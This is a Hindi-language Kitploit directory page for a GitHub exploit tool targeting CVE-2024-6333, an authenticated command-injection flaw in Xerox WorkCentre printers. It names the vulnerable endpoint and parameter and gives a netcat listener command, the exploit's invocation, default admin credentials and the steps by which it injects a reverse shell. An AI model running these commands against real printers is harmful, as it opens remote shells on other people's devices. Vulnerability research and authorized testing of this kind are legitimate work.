Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2024-6333 — Xerox WorkCentre प्रिंटरों में Network Troubleshooting Log सुविधा के माध्यम से प्रमाणित दूरस्थ कोड निष्पादन (Authenticated Remote Code Execution) भेद्यता। | Kitploit
उपकरण/GitHubGitHub/0xqrx/cve-2024-6333
एम्बेडेड सिस्टम सुरक्षाशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगहार्डवेयर और IoT सुरक्षा
GitHub0xqrx/cve-2024-6333

CVE-2024-6333

Xerox WorkCentre प्रिंटरों में Network Troubleshooting Log सुविधा के माध्यम से प्रमाणित दूरस्थ कोड निष्पादन (Authenticated Remote Code Execution) भेद्यता।

रिपॉजिटरी देखें
67 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2024-6333 - ज़ेरॉक्स प्रमाणित रिमोट कोड निष्पादन

नेटवर्क समस्या निवारण लॉग सुविधा के माध्यम से ज़ेरॉक्स WorkCentre प्रिंटर में प्रमाणित रिमोट कोड निष्पादन भेद्यता।

विवरण

नेटवर्क समस्या निवारण लॉग कार्यक्षमता (/properties/security/network_troubleshooting_log.php) गंतव्य सर्वर पैरामीटर (security.nwtroubleshoot.destination.server) को सैनिटाइज़ करने में विफल रहती है, जिससे एक प्रमाणित एडमिनिस्ट्रेटर मनमाने OS कमांड इंजेक्ट कर सकता है। जब नेटवर्क लॉग कैप्चर शुरू किया जाता है, तो इंजेक्ट किया गया पेलोड एक शेल कमांड के रूप में निष्पादित होता है, जिसके परिणामस्वरूप रिमोट कोड निष्पादन होता है।

प्रभावित उत्पाद

  • XEROX WorkCentre 6655 (फ़र्मवेयर 073.110.019.14200 पर परीक्षण किया गया)
  • कई अन्य ज़ेरॉक्स प्रिंटर मॉडल (एडवाइज़री देखें)

संदर्भ

  • https://sec-consult.com/vulnerability-lab/advisory/authenticated-remote-code-execution-in-multiple-xerox-printers/
  • https://nvd.nist.gov/vuln/detail/CVE-2024-6333

आवश्यकताएँ

  • Python 3
  • लक्षित प्रिंटर पर मान्य एडमिन क्रेडेंशियल्स
  • लक्ष्य तक नेटवर्क पहुँच

स्थापना

root@kitploit:~
pip install -r requirements.txt

उपयोग

अपनी मशीन पर एक लिसनर शुरू करें:

root@kitploit:~
nc -lvnp 8443

एक्सप्लॉइट चलाएँ:

root@kitploit:~
python3 CVE-2024-6333.py --target https://<PRINTER_IP> --lhost <YOUR_IP> --lport 8443

तर्क

यह कैसे काम करता है

  1. प्रदान किए गए क्रेडेंशियल्स का उपयोग करके प्रिंटर के वेब इंटरफ़ेस पर प्रमाणित होता है
  2. किसी भी मौजूदा नेटवर्क समस्या निवारण लॉग सत्र को रोकता है
  3. गंतव्य सर्वर फ़ील्ड में एक रिवर्स शेल पेलोड इंजेक्ट करता है
  4. नेटवर्क लॉग कैप्चर को ट्रिगर करता है, जिससे पेलोड निष्पादित होता है
  5. 30 सेकंड प्रतीक्षा करता है, फिर एक क्लीनअप/रोक कमांड भेजता है

अस्वीकरण

यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए प्रदान किया गया है। कंप्यूटर सिस्टम तक अनधिकृत पहुँच अवैध है।

टूल डाउनलोड करें
तर्कआवश्यकडिफ़ॉल्टविवरण
--targetहाँलक्ष्य URL (जैसे, https://192.0.2.1)
--lhostहाँलिसनर IP पता
--lportनहीं8443लिसनर पोर्ट
--userनहींadminएडमिन उपयोगकर्ता नाम
--passwordनहीं1111एडमिन पासवर्ड
--proxyनहींप्रॉक्सी URL (जैसे, http://127.0.0.1:8080)